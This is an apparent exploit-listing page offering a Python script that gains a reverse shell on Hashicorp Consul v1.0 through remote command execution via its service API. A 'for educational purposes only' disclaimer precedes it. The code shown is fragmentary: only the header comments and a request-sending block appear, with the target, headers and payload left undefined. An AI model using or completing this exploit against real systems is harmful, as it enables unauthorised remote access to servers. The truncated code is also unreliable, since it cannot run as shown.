Hashicorp consul v1.0 remote command execution (rce) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-28 |
Type : remote |
Platform : multiple
This exploit / vulnerability Hashicorp consul v1.0 remote command execution (rce) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
# Date: 26/10/2022
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://www.consul.io/
# Description: Exploit for gain reverse shell on Remote Command Execution via API
# References: https://www.consul.io/api/agent/service.html
# Tested on: Ubuntu Server
# Software Link: https://github.com/hashicorp/consul
try:
requests.put(target, headers=headers, json=json)
print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
Hashicorp consul v1.0 remote command execution (rce)